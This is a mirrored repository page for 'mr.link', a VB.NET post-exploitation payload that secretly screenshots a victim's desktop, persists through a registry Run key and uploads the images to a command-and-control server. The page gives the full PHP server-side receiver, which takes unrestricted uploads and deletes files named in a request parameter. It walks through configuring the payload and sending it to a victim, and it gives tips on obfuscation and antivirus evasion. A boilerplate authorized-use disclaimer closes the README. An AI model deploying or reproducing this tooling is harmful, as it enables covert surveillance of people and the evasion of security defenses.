Git Product home page Git Product logo

mr.link's Introduction

forthebadge

Silent Screenshot Capture | Post Exploitation Payload | VB.NET

A simple payload to take the screenshot of victims desktop and upload it to the C&C.

Features:

  • Persistent (Using Registry Run Key)
  • Works in background
  • Less Code Less Bugs and Less Detection ;)
  • Deletes the screenshot from disk after upload it to C&C
  • C&C server in base64
  • Upload screenshots in organized way on C&C
  • No port forwarding needed! works with a single php file
  • [TODO] Machine Information
  • [TODO] Encryption
  • [TODO] Set interval remotely from C&C

Installation & Usage:

  • Clone this repository.
  • A webhosting i recommend namecheap
  • Goto your public_html folder and make new PHP file and put below code in it
<?php
$del = $_GET["dellog"];
$folder = $_GET["folder"];
mkdir($folder,0777);
$file = $_GET["path"];
if (!empty($_FILES["file"])){
move_uploaded_file($_FILES["file"]["tmp_name"],
      $file . "/" . $_FILES["file"]["name"]);
}
unlink($del);
?>
  • Open the project in Visual Studio and the edit below variable in source code
Dim server As String = BaseDecode1("your server address here in base64 encoded") 
  • and edit this variable below as well
Dim php As String = "yourphpfilename.php?" & "folder="
  • Just compile it and send it to the victim thats all !!

Million Dollar Advice ;)

To Avoid Antivirus Detection

  • Change the app icon
  • Generate new GUID
  • Changes all the variables
  • Obfuscate the code using Obfuscar
  • Change the Assembly information

Donation:

If this tool has been useful for you, feel free to thank me by buying me a coffee :)

N|Solid

Disclaimer:

This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal.

License:

GNU GENERAL PUBLIC LICENSE

mr.link's People

Contributors

ahmadchenwangxuesi avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.